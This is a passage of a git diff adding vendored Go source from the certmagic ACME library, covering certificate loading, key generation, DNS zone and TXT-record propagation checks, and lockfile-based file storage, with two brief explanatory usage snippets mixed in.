}
|
||||
|
||||
keyBytes, err := cfg.Storage.Load(ctx, StorageKeys.SitePrivateKey(certRes.issuerKey, normalizedName))
|
||||
if err != nil {
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
certRes.PrivateKeyPEM = keyBytes
|
||||
certBytes, err := cfg.Storage.Load(ctx, StorageKeys.SiteCert(certRes.issuerKey, normalizedName))
|
||||
if err != nil {
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
certRes.CertificatePEM = certBytes
|
||||
metaBytes, err := cfg.Storage.Load(ctx, StorageKeys.SiteMeta(certRes.issuerKey, normalizedName))
|
||||
if err != nil {
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
err = json.Unmarshal(metaBytes, &certRes)
|
||||
if err != nil {
|
||||
return CertificateResource{}, fmt.Errorf("decoding certificate metadata: %v", err)
|
||||
}
|
||||
|
||||
return certRes, nil
|
||||
}
|
||||
|
||||
// hashCertificateChain computes the unique hash of certChain,
|
||||
// which is the chain of DER-encoded bytes. It returns the
|
||||
// hex encoding of the hash.
|
||||
func hashCertificateChain(certChain [][]byte) string {
|
||||
h := sha256.New()
|
||||
for _, certInChain := range certChain {
|
||||
h.Write(certInChain)
|
||||
}
|
||||
return fmt.Sprintf("%x", h.Sum(nil))
|
||||
}
|
||||
|
||||
func namesFromCSR(csr *x509.CertificateRequest) []string {
|
||||
var nameSet []string
|
||||
nameSet = append(nameSet, csr.DNSNames...)
|
||||
nameSet = append(nameSet, csr.EmailAddresses...)
|
||||
for _, v := range csr.IPAddresses {
|
||||
nameSet = append(nameSet, v.String())
|
||||
}
|
||||
for _, v := range csr.URIs {
|
||||
nameSet = append(nameSet, v.String())
|
||||
}
|
||||
return nameSet
|
||||
}
|
||||
|
||||
// preferredDefaultCipherSuites returns an appropriate
|
||||
// cipher suite to use depending on hardware support
|
||||
// for AES-NI.
|
||||
//
|
||||
// See https://github.com/mholt/caddy/issues/1674
|
||||
func preferredDefaultCipherSuites() []uint16 {
|
||||
if cpuid.CPU.Supports(cpuid.AESNI) {
|
||||
return defaultCiphersPreferAES
|
||||
}
|
||||
return defaultCiphersPreferChaCha
|
||||
}
|
||||
|
||||
var (
|
||||
defaultCiphersPreferAES = []uint16{
|
||||
tls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
|
||||
tls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
|
||||
tls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
|
||||
tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
|
||||
tls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305,
|
||||
tls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305,
|
||||
}
|
||||
defaultCiphersPreferChaCha = []uint16{
|
||||
tls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305,
|
||||
tls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305,
|
||||
tls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
|
||||
tls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
|
||||
tls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
|
||||
tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
|
||||
}
|
||||
)
|
||||
|
||||
// StandardKeyGenerator is the standard, in-memory key source
|
||||
// that uses crypto/rand.
|
||||
type StandardKeyGenerator struct {
|
||||
// The type of keys to generate.
|
||||
KeyType KeyType
|
||||
}
|
||||
|
||||
// GenerateKey generates a new private key according to kg.KeyType.
|
||||
func (kg StandardKeyGenerator) GenerateKey() (crypto.PrivateKey, error) {
|
||||
switch kg.KeyType {
|
||||
case ED25519:
|
||||
_, priv, err := ed25519.GenerateKey(rand.Reader)
|
||||
return priv, err
|
||||
case "", P256:
|
||||
return ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
||||
case P384:
|
||||
return ecdsa.GenerateKey(elliptic.P384(), rand.Reader)
|
||||
case RSA2048:
|
||||
return rsa.GenerateKey(rand.Reader, 2048)
|
||||
case RSA4096:
|
||||
return rsa.GenerateKey(rand.Reader, 4096)
|
||||
case RSA8192:
|
||||
return rsa.GenerateKey(rand.Reader, 8192)
|
||||
}
|
||||
return nil, fmt.Errorf("unrecognized or unsupported key type: %s", kg.KeyType)
|
||||
}
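
For example, to generate a P-384 key instead of the package default P-256:

gen := StandardKeyGenerator{KeyType: P384}
priv, err := gen.GenerateKey() // *ecdsa.PrivateKey on curve P-384
if err != nil {
	log.Fatal(err)
}
_ = priv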
|
||||
|
||||
// DefaultKeyGenerator is the default key source.
|
||||
var DefaultKeyGenerator = StandardKeyGenerator{KeyType: P256}
|
||||
|
||||
// KeyType enumerates the known/supported key types.
|
||||
type KeyType string
|
||||
|
||||
// Constants for all key types we support.
|
||||
const (
|
||||
ED25519 = KeyType("ed25519")
|
||||
P256 = KeyType("p256")
|
||||
P384 = KeyType("p384")
|
||||
RSA2048 = KeyType("rsa2048")
|
||||
RSA4096 = KeyType("rsa4096")
|
||||
RSA8192 = KeyType("rsa8192")
|
||||
)
|
340 vendor/github.com/caddyserver/certmagic/dnsutil.go (generated, vendored, new file)
@@ -0,0 +1,340 @@
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"net"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/miekg/dns"
|
||||
)
|
||||
|
||||
// Code in this file adapted from go-acme/lego, July 2020:
|
||||
// https://github.com/go-acme/lego
|
||||
// by Ludovic Fernandez and Dominik Menke
|
||||
//
|
||||
// It has been modified.
|
||||
|
||||
// findZoneByFQDN determines the zone apex for the given fqdn by recursing
|
||||
// up the domain labels until the nameserver returns a SOA record in the
|
||||
// answer section.
|
||||
func findZoneByFQDN(fqdn string, nameservers []string) (string, error) {
|
||||
if !strings.HasSuffix(fqdn, ".") {
|
||||
fqdn += "."
|
||||
}
|
||||
soa, err := lookupSoaByFqdn(fqdn, nameservers)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
return soa.zone, nil
|
||||
}
|
||||
|
||||
func lookupSoaByFqdn(fqdn string, nameservers []string) (*soaCacheEntry, error) {
|
||||
if !strings.HasSuffix(fqdn, ".") {
|
||||
fqdn += "."
|
||||
}
|
||||
|
||||
fqdnSOACacheMu.Lock()
|
||||
defer fqdnSOACacheMu.Unlock()
|
||||
|
||||
// prefer cached version if fresh
|
||||
if ent := fqdnSOACache[fqdn]; ent != nil && !ent.isExpired() {
|
||||
return ent, nil
|
||||
}
|
||||
|
||||
ent, err := fetchSoaByFqdn(fqdn, nameservers)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// save result to cache, but don't allow
|
||||
// the cache to grow out of control
|
||||
if len(fqdnSOACache) >= 1000 {
|
||||
for key := range fqdnSOACache {
|
||||
delete(fqdnSOACache, key)
|
||||
break
|
||||
}
|
||||
}
|
||||
fqdnSOACache[fqdn] = ent
|
||||
|
||||
return ent, nil
|
||||
}
|
||||
|
||||
func fetchSoaByFqdn(fqdn string, nameservers []string) (*soaCacheEntry, error) {
|
||||
var err error
|
||||
var in *dns.Msg
|
||||
|
||||
labelIndexes := dns.Split(fqdn)
|
||||
for _, index := range labelIndexes {
|
||||
domain := fqdn[index:]
|
||||
|
||||
in, err = dnsQuery(domain, dns.TypeSOA, nameservers, true)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if in == nil {
|
||||
continue
|
||||
}
|
||||
|
||||
switch in.Rcode {
|
||||
case dns.RcodeSuccess:
|
||||
// Check if we got a SOA RR in the answer section
|
||||
if len(in.Answer) == 0 {
|
||||
continue
|
||||
}
|
||||
|
||||
// CNAME records cannot/should not exist at the root of a zone.
|
||||
// So we skip a domain when a CNAME is found.
|
||||
if dnsMsgContainsCNAME(in) {
|
||||
continue
|
||||
}
|
||||
|
||||
for _, ans := range in.Answer {
|
||||
if soa, ok := ans.(*dns.SOA); ok {
|
||||
return newSoaCacheEntry(soa), nil
|
||||
}
|
||||
}
|
||||
case dns.RcodeNameError:
|
||||
// NXDOMAIN
|
||||
default:
|
||||
// Any response code other than NOERROR and NXDOMAIN is treated as error
|
||||
return nil, fmt.Errorf("unexpected response code '%s' for %s", dns.RcodeToString[in.Rcode], domain)
|
||||
}
|
||||
}
|
||||
|
||||
return nil, fmt.Errorf("could not find the start of authority for %s%s", fqdn, formatDNSError(in, err))
|
||||
}
|
||||
|
||||
// dnsMsgContainsCNAME checks for a CNAME answer in msg
|
||||
func dnsMsgContainsCNAME(msg *dns.Msg) bool {
|
||||
for _, ans := range msg.Answer {
|
||||
if _, ok := ans.(*dns.CNAME); ok {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func dnsQuery(fqdn string, rtype uint16, nameservers []string, recursive bool) (*dns.Msg, error) {
|
||||
m := createDNSMsg(fqdn, rtype, recursive)
|
||||
var in *dns.Msg
|
||||
var err error
|
||||
for _, ns := range nameservers {
|
||||
in, err = sendDNSQuery(m, ns)
|
||||
if err == nil && len(in.Answer) > 0 {
|
||||
break
|
||||
}
|
||||
}
|
||||
return in, err
|
||||
}
|
||||
|
||||
func createDNSMsg(fqdn string, rtype uint16, recursive bool) *dns.Msg {
|
||||
m := new(dns.Msg)
|
||||
m.SetQuestion(fqdn, rtype)
|
||||
m.SetEdns0(4096, false)
|
||||
if !recursive {
|
||||
m.RecursionDesired = false
|
||||
}
|
||||
return m
|
||||
}
|
||||
|
||||
func sendDNSQuery(m *dns.Msg, ns string) (*dns.Msg, error) {
|
||||
udp := &dns.Client{Net: "udp", Timeout: dnsTimeout}
|
||||
in, _, err := udp.Exchange(m, ns)
|
||||
// two kinds of errors we can handle by retrying with TCP:
|
||||
// truncation and timeout; see https://github.com/caddyserver/caddy/issues/3639
|
||||
truncated := in != nil && in.Truncated
|
||||
timeoutErr := err != nil && strings.Contains(err.Error(), "timeout")
|
||||
if truncated || timeoutErr {
|
||||
tcp := &dns.Client{Net: "tcp", Timeout: dnsTimeout}
|
||||
in, _, err = tcp.Exchange(m, ns)
|
||||
}
|
||||
return in, err
|
||||
}
|
||||
|
||||
func formatDNSError(msg *dns.Msg, err error) string {
|
||||
var parts []string
|
||||
if msg != nil {
|
||||
parts = append(parts, dns.RcodeToString[msg.Rcode])
|
||||
}
|
||||
if err != nil {
|
||||
parts = append(parts, err.Error())
|
||||
}
|
||||
if len(parts) > 0 {
|
||||
return ": " + strings.Join(parts, " ")
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// soaCacheEntry holds a cached SOA record (only selected fields)
|
||||
type soaCacheEntry struct {
|
||||
zone string // zone apex (a domain name)
|
||||
primaryNs string // primary nameserver for the zone apex
|
||||
expires time.Time // time when this cache entry should be evicted
|
||||
}
|
||||
|
||||
func newSoaCacheEntry(soa *dns.SOA) *soaCacheEntry {
|
||||
return &soaCacheEntry{
|
||||
zone: soa.Hdr.Name,
|
||||
primaryNs: soa.Ns,
|
||||
expires: time.Now().Add(time.Duration(soa.Refresh) * time.Second),
|
||||
}
|
||||
}
|
||||
|
||||
// isExpired checks whether a cache entry should be considered expired.
|
||||
func (cache *soaCacheEntry) isExpired() bool {
|
||||
return time.Now().After(cache.expires)
|
||||
}
|
||||
|
||||
// systemOrDefaultNameservers attempts to get system nameservers from the
|
||||
// resolv.conf file given by path before falling back to hard-coded defaults.
|
||||
func systemOrDefaultNameservers(path string, defaults []string) []string {
|
||||
config, err := dns.ClientConfigFromFile(path)
|
||||
if err != nil || len(config.Servers) == 0 {
|
||||
return defaults
|
||||
}
|
||||
return config.Servers
|
||||
}
|
||||
|
||||
// populateNameserverPorts ensures that all nameservers have a port number.
|
||||
func populateNameserverPorts(servers []string) {
|
||||
for i := range servers {
|
||||
_, port, _ := net.SplitHostPort(servers[i])
|
||||
if port == "" {
|
||||
servers[i] = net.JoinHostPort(servers[i], "53")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// checkDNSPropagation checks if the expected TXT record has been propagated to all authoritative nameservers.
|
||||
func checkDNSPropagation(fqdn, value string, resolvers []string) (bool, error) {
|
||||
if !strings.HasSuffix(fqdn, ".") {
|
||||
fqdn += "."
|
||||
}
|
||||
|
||||
// Initial attempt to resolve at the recursive NS
|
||||
r, err := dnsQuery(fqdn, dns.TypeTXT, resolvers, true)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
if r.Rcode == dns.RcodeSuccess {
|
||||
fqdn = updateDomainWithCName(r, fqdn)
|
||||
}
|
||||
|
||||
authoritativeNss, err := lookupNameservers(fqdn, resolvers)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
return checkAuthoritativeNss(fqdn, value, authoritativeNss)
|
||||
}
|
||||
|
||||
// checkAuthoritativeNss queries each of the given nameservers for the expected TXT record.
|
||||
func checkAuthoritativeNss(fqdn, value string, nameservers []string) (bool, error) {
|
||||
for _, ns := range nameservers {
|
||||
r, err := dnsQuery(fqdn, dns.TypeTXT, []string{net.JoinHostPort(ns, "53")}, false)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
if r.Rcode != dns.RcodeSuccess {
|
||||
if r.Rcode == dns.RcodeNameError {
|
||||
// if Present() succeeded, then it must show up eventually, or else
|
||||
// something is really broken in the DNS provider or their API;
|
||||
// no need for error here, simply have the caller try again
|
||||
return false, nil
|
||||
}
|
||||
return false, fmt.Errorf("NS %s returned %s for %s", ns, dns.RcodeToString[r.Rcode], fqdn)
|
||||
}
|
||||
|
||||
var found bool
|
||||
for _, rr := range r.Answer {
|
||||
if txt, ok := rr.(*dns.TXT); ok {
|
||||
record := strings.Join(txt.Txt, "")
|
||||
if record == value {
|
||||
found = true
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if !found {
|
||||
return false, nil
|
||||
}
|
||||
}
|
||||
|
||||
return true, nil
|
||||
}
|
||||
|
||||
// lookupNameservers returns the authoritative nameservers for the given fqdn.
|
||||
func lookupNameservers(fqdn string, resolvers []string) ([]string, error) {
|
||||
var authoritativeNss []string
|
||||
|
||||
zone, err := findZoneByFQDN(fqdn, resolvers)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("could not determine the zone: %w", err)
|
||||
}
|
||||
|
||||
r, err := dnsQuery(zone, dns.TypeNS, resolvers, true)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
for _, rr := range r.Answer {
|
||||
if ns, ok := rr.(*dns.NS); ok {
|
||||
authoritativeNss = append(authoritativeNss, strings.ToLower(ns.Ns))
|
||||
}
|
||||
}
|
||||
|
||||
if len(authoritativeNss) > 0 {
|
||||
return authoritativeNss, nil
|
||||
}
|
||||
return nil, errors.New("could not determine authoritative nameservers")
|
||||
}
|
||||
|
||||
// Update FQDN with CNAME if any
|
||||
func updateDomainWithCName(r *dns.Msg, fqdn string) string {
|
||||
for _, rr := range r.Answer {
|
||||
if cn, ok := rr.(*dns.CNAME); ok {
|
||||
if cn.Hdr.Name == fqdn {
|
||||
return cn.Target
|
||||
}
|
||||
}
|
||||
}
|
||||
return fqdn
|
||||
}
|
||||
|
||||
// recursiveNameservers are used to pre-check DNS propagation. It
|
||||
// picks user-configured nameservers (custom) OR the defaults
|
||||
// obtained from resolv.conf and defaultNameservers if none is
|
||||
// configured and ensures that all server addresses have a port value.
|
||||
func recursiveNameservers(custom []string) []string {
|
||||
var servers []string
|
||||
if len(custom) == 0 {
|
||||
servers = systemOrDefaultNameservers(defaultResolvConf, defaultNameservers)
|
||||
} else {
|
||||
servers = make([]string, len(custom))
|
||||
copy(servers, custom)
|
||||
}
|
||||
populateNameserverPorts(servers)
|
||||
return servers
|
||||
}
|
||||
|
||||
var defaultNameservers = []string{
|
||||
"8.8.8.8:53",
|
||||
"8.8.4.4:53",
|
||||
"1.1.1.1:53",
|
||||
"1.0.0.1:53",
|
||||
}
|
||||
|
||||
var dnsTimeout = 10 * time.Second
|
||||
|
||||
var (
|
||||
fqdnSOACache = map[string]*soaCacheEntry{}
|
||||
fqdnSOACacheMu sync.Mutex
|
||||
)
|
||||
|
||||
const defaultResolvConf = "/etc/resolv.conf"
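The helpers in dnsutil.go are unexported, so they cannot be called from outside the package. As a standalone illustration of the port-defaulting idea behind `populateNameserverPorts`, here is a small sketch using only the standard library (the name `ensurePort53` is hypothetical):

```go
package main

import (
	"fmt"
	"net"
)

// ensurePort53 mirrors the port-defaulting idea of populateNameserverPorts
// above: any resolver address without an explicit port gets ":53" appended.
func ensurePort53(servers []string) {
	for i := range servers {
		if _, port, _ := net.SplitHostPort(servers[i]); port == "" {
			servers[i] = net.JoinHostPort(servers[i], "53")
		}
	}
}

func main() {
	ns := []string{"8.8.8.8", "1.1.1.1:53"}
	ensurePort53(ns)
	fmt.Println(ns) // prints [8.8.8.8:53 1.1.1.1:53]
}
```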
|
404
vendor/github.com/caddyserver/certmagic/filestorage.go
generated
vendored
Normal file
@ -0,0 +1,404 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"io/fs"
|
||||
"log"
|
||||
"os"
|
||||
"path"
|
||||
"path/filepath"
|
||||
"runtime"
|
||||
"time"
|
||||
)
|
||||
|
||||
// FileStorage facilitates forming file paths derived from a root
|
||||
// directory. It is used to get file paths in a consistent,
|
||||
// cross-platform way for persisting ACME assets on the file system.
|
||||
// The presence of a lock file for a given key indicates a lock
|
||||
// is held and is thus unavailable.
|
||||
//
|
||||
// Locks are created atomically by relying on the file system to
|
||||
// enforce the O_EXCL flag. Acquirers that are forcefully terminated
|
||||
// will not have a chance to clean up their locks before they exit,
|
||||
// so locks may become stale. That is why, while a lock is actively
|
||||
// held, the contents of the lockfile are updated with the current
|
||||
// timestamp periodically. If another instance tries to acquire the
|
||||
// lock but fails, it can see if the timestamp within is still fresh.
|
||||
// If so, it patiently waits by polling occasionally. Otherwise,
|
||||
// the stale lockfile is deleted, essentially forcing an unlock.
|
||||
//
|
||||
// While locking is atomic, unlocking is not perfectly atomic. File
|
||||
// systems offer native atomic operations when creating files, but
|
||||
// not necessarily when deleting them. It is theoretically possible
|
||||
// for two instances to discover the same stale lock and both proceed
|
||||
// to delete it, but if one instance is able to delete the lockfile
|
||||
// and create a new one before the other one calls delete, then the
|
||||
// new lock file created by the first instance will get deleted by
|
||||
// mistake. This does mean that mutual exclusion is not guaranteed
|
||||
// to be perfectly enforced in the presence of stale locks. One
|
||||
// alternative is to lock the unlock operation by using ".unlock"
|
||||
// files; and we did this for some time, but those files themselves
|
||||
// may become stale, leading applications into infinite loops if
|
||||
// they always expect the unlock file to be deleted by the instance
|
||||
// that created it. We instead prefer the simpler solution that
|
||||
// implies imperfect mutual exclusion if locks become stale, but
|
||||
// that is probably less severe a consequence than infinite loops.
|
||||
//
|
||||
// See https://github.com/caddyserver/caddy/issues/4448 for discussion.
|
||||
// See commit 468bfd25e452196b140148928cdd1f1a2285ae4b for where we
|
||||
// switched away from using .unlock files.
|
||||
type FileStorage struct {
|
||||
Path string
|
||||
}
|
||||
|
||||
// Exists returns true if key exists in s.
|
||||
func (s *FileStorage) Exists(_ context.Context, key string) bool {
|
||||
_, err := os.Stat(s.Filename(key))
|
||||
return !errors.Is(err, fs.ErrNotExist)
|
||||
}
|
||||
|
||||
// Store saves value at key.
|
||||
func (s *FileStorage) Store(_ context.Context, key string, value []byte) error {
|
||||
filename := s.Filename(key)
|
||||
err := os.MkdirAll(filepath.Dir(filename), 0700)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
return os.WriteFile(filename, value, 0600)
|
||||
}
|
||||
|
||||
// Load retrieves the value at key.
|
||||
func (s *FileStorage) Load(_ context.Context, key string) ([]byte, error) {
|
||||
return os.ReadFile(s.Filename(key))
|
||||
}
|
||||
|
||||
// Delete deletes the value at key.
|
||||
func (s *FileStorage) Delete(_ context.Context, key string) error {
|
||||
return os.Remove(s.Filename(key))
|
||||
}
|
||||
|
||||
// List returns all keys that match prefix.
|
||||
func (s *FileStorage) List(ctx context.Context, prefix string, recursive bool) ([]string, error) {
|
||||
var keys []string
|
||||
walkPrefix := s.Filename(prefix)
|
||||
|
||||
err := filepath.Walk(walkPrefix, func(fpath string, info os.FileInfo, err error) error {
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if info == nil {
|
||||
return fmt.Errorf("%s: file info is nil", fpath)
|
||||
}
|
||||
if fpath == walkPrefix {
|
||||
return nil
|
||||
}
|
||||
if ctxErr := ctx.Err(); ctxErr != nil {
|
||||
return ctxErr
|
||||
}
|
||||
|
||||
suffix, err := filepath.Rel(walkPrefix, fpath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("%s: could not make path relative: %v", fpath, err)
|
||||
}
|
||||
keys = append(keys, path.Join(prefix, suffix))
|
||||
|
||||
if !recursive && info.IsDir() {
|
||||
return filepath.SkipDir
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
return keys, err
|
||||
}
|
||||
|
||||
// Stat returns information about key.
|
||||
func (s *FileStorage) Stat(_ context.Context, key string) (KeyInfo, error) {
|
||||
fi, err := os.Stat(s.Filename(key))
|
||||
if err != nil {
|
||||
return KeyInfo{}, err
|
||||
}
|
||||
return KeyInfo{
|
||||
Key: key,
|
||||
Modified: fi.ModTime(),
|
||||
Size: fi.Size(),
|
||||
IsTerminal: !fi.IsDir(),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Filename returns the key as a path on the file
|
||||
// system prefixed by s.Path.
|
||||
func (s *FileStorage) Filename(key string) string {
|
||||
return filepath.Join(s.Path, filepath.FromSlash(key))
|
||||
}
|
||||
|
||||
// Lock obtains a lock named by the given key. It blocks
|
||||
// until the lock can be obtained or an error is returned.
|
||||
func (s *FileStorage) Lock(ctx context.Context, key string) error {
|
||||
filename := s.lockFilename(key)
|
||||
|
||||
for {
|
||||
err := createLockfile(filename)
|
||||
if err == nil {
|
||||
// got the lock, yay
|
||||
return nil
|
||||
}
|
||||
if !os.IsExist(err) {
|
||||
// unexpected error
|
||||
return fmt.Errorf("creating lock file: %v", err)
|
||||
}
|
||||
|
||||
// lock file already exists
|
||||
|
||||
var meta lockMeta
|
||||
f, err := os.Open(filename)
|
||||
if err == nil {
|
||||
err2 := json.NewDecoder(f).Decode(&meta)
|
||||
f.Close()
|
||||
if err2 != nil {
|
||||
return fmt.Errorf("decoding lockfile contents: %w", err2)
|
||||
}
|
||||
}
|
||||
|
||||
switch {
|
||||
case os.IsNotExist(err):
|
||||
// must have just been removed; try again to create it
|
||||
continue
|
||||
|
||||
case err != nil:
|
||||
// unexpected error
|
||||
return fmt.Errorf("accessing lock file: %v", err)
|
||||
|
||||
case fileLockIsStale(meta):
|
||||
// lock file is stale - delete it and try again to obtain lock
|
||||
// (NOTE: locking becomes imperfect if lock files are stale; known solutions
|
||||
// either have potential to cause infinite loops, as in caddyserver/caddy#4448,
|
||||
// or must give up on perfect mutual exclusivity; however, these cases are rare,
|
||||
// so we prefer the simpler solution that avoids infinite loops)
|
||||
log.Printf("[INFO][%s] Lock for '%s' is stale (created: %s, last update: %s); removing then retrying: %s",
|
||||
s, key, meta.Created, meta.Updated, filename)
|
||||
if err = os.Remove(filename); err != nil { // hopefully we can replace the lock file quickly!
|
||||
if !errors.Is(err, fs.ErrNotExist) {
|
||||
return fmt.Errorf("unable to delete stale lock; deadlocked: %w", err)
|
||||
}
|
||||
}
|
||||
continue
|
||||
|
||||
default:
|
||||
// lockfile exists and is not stale;
|
||||
// just wait a moment and try again,
|
||||
// or return if context cancelled
|
||||
select {
|
||||
case <-time.After(fileLockPollInterval):
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Unlock releases the lock for name.
|
||||
func (s *FileStorage) Unlock(_ context.Context, key string) error {
|
||||
return os.Remove(s.lockFilename(key))
|
||||
}
|
||||
|
||||
func (s *FileStorage) String() string {
|
||||
return "FileStorage:" + s.Path
|
||||
}
|
||||
|
||||
func (s *FileStorage) lockFilename(key string) string {
|
||||
return filepath.Join(s.lockDir(), StorageKeys.Safe(key)+".lock")
|
||||
}
|
||||
|
||||
func (s *FileStorage) lockDir() string {
|
||||
return filepath.Join(s.Path, "locks")
|
||||
}
|
||||
|
||||
func fileLockIsStale(meta lockMeta) bool {
|
||||
ref := meta.Updated
|
||||
if ref.IsZero() {
|
||||
ref = meta.Created
|
||||
}
|
||||
// since updates are exactly every lockFreshnessInterval,
|
||||
// add a grace period for the actual file read+write to
|
||||
// take place
|
||||
return time.Since(ref) > lockFreshnessInterval*2
|
||||
}
|
||||
|
||||
// createLockfile atomically creates the lockfile
|
||||
// identified by filename. A successfully created
|
||||
// lockfile should be removed with removeLockfile.
|
||||
func createLockfile(filename string) error {
|
||||
err := atomicallyCreateFile(filename, true)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
go keepLockfileFresh(filename)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// keepLockfileFresh continuously updates the lock file
|
||||
// at filename with the current timestamp. It stops
|
||||
// when the file disappears (happy path = lock released),
|
||||
// or when there is an error at any point. Since it polls
|
||||
// every lockFreshnessInterval, this function might
|
||||
// not terminate until up to lockFreshnessInterval after
|
||||
// the lock is released.
|
||||
func keepLockfileFresh(filename string) {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: active locking: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
|
||||
for {
|
||||
time.Sleep(lockFreshnessInterval)
|
||||
done, err := updateLockfileFreshness(filename)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Keeping lock file fresh: %v - terminating lock maintenance (lockfile: %s)", err, filename)
|
||||
return
|
||||
}
|
||||
if done {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// updateLockfileFreshness updates the lock file at filename
|
||||
// with the current timestamp. It returns true if the parent
|
||||
// loop can terminate (i.e. no more need to update the lock).
|
||||
func updateLockfileFreshness(filename string) (bool, error) {
|
||||
f, err := os.OpenFile(filename, os.O_RDWR, 0644)
|
||||
if os.IsNotExist(err) {
|
||||
return true, nil // lock released
|
||||
}
|
||||
if err != nil {
|
||||
return true, err
|
||||
}
|
||||
defer f.Close()
|
||||
|
||||
// read contents
|
||||
metaBytes, err := io.ReadAll(io.LimitReader(f, 2048))
|
||||
if err != nil {
|
||||
return true, err
|
||||
}
|
||||
var meta lockMeta
|
||||
if err := json.Unmarshal(metaBytes, &meta); err != nil {
|
||||
return true, err
|
||||
}
|
||||
|
||||
// truncate file and reset I/O offset to beginning
|
||||
if err := f.Truncate(0); err != nil {
|
||||
return true, err
|
||||
}
|
||||
if _, err := f.Seek(0, io.SeekStart); err != nil {
|
||||
return true, err
|
||||
}
|
||||
|
||||
// write updated timestamp
|
||||
meta.Updated = time.Now()
|
||||
if err = json.NewEncoder(f).Encode(meta); err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
// sync to device; we suspect that sometimes file systems
|
||||
// (particularly AWS EFS) don't do this on their own,
|
||||
// leaving the file empty when we close it; see
|
||||
// https://github.com/caddyserver/caddy/issues/3954
|
||||
return false, f.Sync()
|
||||
}
|
||||
|
||||
// atomicallyCreateFile atomically creates the file
|
||||
// identified by filename if it doesn't already exist.
|
||||
func atomicallyCreateFile(filename string, writeLockInfo bool) error {
|
||||
// no need to check this error, we only really care about the file creation error
|
||||
_ = os.MkdirAll(filepath.Dir(filename), 0700)
|
||||
f, err := os.OpenFile(filename, os.O_CREATE|os.O_WRONLY|os.O_EXCL, 0644)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer f.Close()
|
||||
if writeLockInfo {
|
||||
now := time.Now()
|
||||
meta := lockMeta{
|
||||
Created: now,
|
||||
Updated: now,
|
||||
}
|
||||
if err := json.NewEncoder(f).Encode(meta); err != nil {
|
||||
return err
|
||||
}
|
||||
// see https://github.com/caddyserver/caddy/issues/3954
|
||||
if err := f.Sync(); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// homeDir returns the best guess of the current user's home
|
||||
// directory from environment variables. If unknown, "." (the
|
||||
// current directory) is returned instead.
|
||||
func homeDir() string {
|
||||
home := os.Getenv("HOME")
|
||||
if home == "" && runtime.GOOS == "windows" {
|
||||
drive := os.Getenv("HOMEDRIVE")
|
||||
path := os.Getenv("HOMEPATH")
|
||||
home = drive + path
|
||||
if drive == "" || path == "" {
|
||||
home = os.Getenv("USERPROFILE")
|
||||
}
|
||||
}
|
||||
if home == "" {
|
||||
home = "."
|
||||
}
|
||||
return home
|
||||
}
|
||||
|
||||
func dataDir() string {
|
||||
baseDir := filepath.Join(homeDir(), ".local", "share")
|
||||
if xdgData := os.Getenv("XDG_DATA_HOME"); xdgData != "" {
|
||||
baseDir = xdgData
|
||||
}
|
